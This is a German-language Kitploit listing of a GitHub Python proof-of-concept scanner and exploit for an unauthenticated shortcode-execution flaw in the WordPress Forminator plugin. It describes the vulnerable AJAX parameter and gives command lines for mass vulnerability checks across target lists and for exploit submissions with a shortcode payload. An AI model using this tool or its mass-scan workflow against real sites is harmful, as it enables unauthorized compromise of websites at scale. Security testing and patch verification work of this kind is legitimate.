Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-92229 — Python-3-PoC-Scanner und Exploit für CVE-2026-92229, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung im WordPress-Plugin Forminator in den Versionen 1.57.2 und darunter. | Kitploit
Tools/GitHubGitHub/murrez/cve-2026-92229
SchwachstellenscannerSchwachstellenanalyseExploitationScripting & AutomatisierungWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmurrez/cve-2026-92229

CVE-2026-92229

Python-3-PoC-Scanner und Exploit für CVE-2026-92229, eine nicht authentifizierte Schwachstelle zur beliebigen Shortcode-Ausführung im WordPress-Plugin Forminator in den Versionen 1.57.2 und darunter.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-92229 — Forminator Unauthentifizierte Ausführung beliebiger Shortcodes

Python-3-PoC-Scanner/Exploit für CVE-2026-92229 in Forminator (WPMU DEV).

Pluginforminator
Betroffen≤ 1.57.2
Behoben in1.57.3+
CVSS9.1 (Kritisch)
AuthUnauthentifiziert
VektorPOST-Parameter current_url (Quiz-AJAX)
CWECWE-94 (Code Injection)
CreditKuba (Wordfence)

Zusammenfassung

In anfälligen Versionen wird das vom Benutzer bereitgestellte current_url im HTML des Quiz-Ergebnisses reflektiert (z. B. in Social-Share-Attributen) und der Response-Buffer wird mit WordPress do_shortcode() verarbeitet. Ein unauthentifizierter Angreifer kann ein Quiz über admin-ajax.php mit einem bösartigen current_url einreichen, das beliebige Shortcodes einbettet.

Primäre AJAX-Aktionen:

  • forminator_submit_form_quizzes
  • forminator_submit_preview_form_quizzes (Vorschau; --preview)

Behoben in 1.57.3 durch Beschränkung der Shortcode-Ausführung auf die vorgesehenen Textfelder anstelle des gesamten HTML-Buffers.

Voraussetzungen

  • Python 3.9+
  • pip install -r requirements.txt

Verwendung

root@kitploit:~
pip install -r requirements.txt

# Detect plugin, version, public Forminator modules (quiz answers when parseable)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 30 --quiet

# Exploit (auto nonce + quiz answers when possible)
python poc.py -u https://target.example --mode exploit \
  --page-url /quiz/ --form-id 42 \
  --shortcode "PROBE"

# Preview submit (no stored entry, same code path)
python poc.py -u https://target.example --mode exploit --preview \
  --page-url /quiz/ --form-id 42

# Manual quiz answers if HTML parsing fails
python poc.py -u https://target.example --mode exploit \
  --form-id 42 --answers "2051:7608,2052:7610"

CLI-Optionen

OptionBeschreibung
-u, --urlEinzelne Ziel-Basis-URL
--listDatei mit einer URL pro Zeile
--modecheck (Standard) oder exploit
--page-urlSeitenpfad oder URL, die das Formular enthält
--form-idForminator-Modul-ID
--form-typequizzes, custom-forms oder poll
--answersQuiz-Antworten als question_id:answer_id,...
--shortcodeShortcode-Payload (eingebettet in [caption]…[/caption] innerhalb von current_url)
--previewVorschau-AJAX-Aktion verwenden
--threads, -jParallelität beim Massenscan (Standard 20)
--outputJSONL-Ergebnisse (Standard cve_2026_92229_results.jsonl)
--vuln-listTextdatei für Check-Treffer (Standard hits.txt)
--candidates-listJSONL-Metadaten für ausnutzbare Checks (Standard candidates.jsonl)
--quietWeniger Fortschrittsausgaben bei Massenläufen

Ausgabe (Mass Check)

DateiInhalt
cve_2026_92229_results.jsonlJSON pro Ziel (status, version, modules, …)
hits.txtBasis-URLs mit exploitable_candidate: true
candidates.jsonlTrefferdetails: form_id, page_url, form_type

Häufige status-Werte

StatusBedeutung
candidateAnfällige Version + Quiz mit geparsten Antworten
form_no_quiz_answersFormular gefunden, aber Quiz-Antworten nicht automatisch geparst
plugin_no_public_formPlugin vorhanden, kein öffentliches Modul entdeckt
patchedVersion ≥ 1.57.3 (oder neuere Hauptversion)
no_pluginForminator nicht erkannt

Einschränkungen

  • Quiz-Module entsprechen dem anfälligen Codepfad in ≤1.57.2; Kontaktformulare allein sind nicht ausreichend.
  • Der Check-Modus markiert exploitable_candidate nur, wenn Quiz-answers[qid] aus dem HTML geparst werden können (viele Websites verwenden JS-gerenderte Quizze → --answers oder manuellen Exploit verwenden).
  • Die Auswirkung von Shortcodes hängt von den installierten Plugins/Themes ab (mit harmlosen Shortcodes wie [caption] testen).

Repository-Struktur

root@kitploit:~
.
├── poc.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

Lokale Massenscan-Listen (z. B. list.txt, FOFA-Exporte, *.jsonl-Ergebnisse) sind in .gitignore aufgeführt und sollten nicht committet werden.

Rechtliches

Nur für autorisiertes Sicherheitstesting. Sie sind für die Einhaltung der geltenden Gesetze und Programmregeln verantwortlich.

Tool herunterladen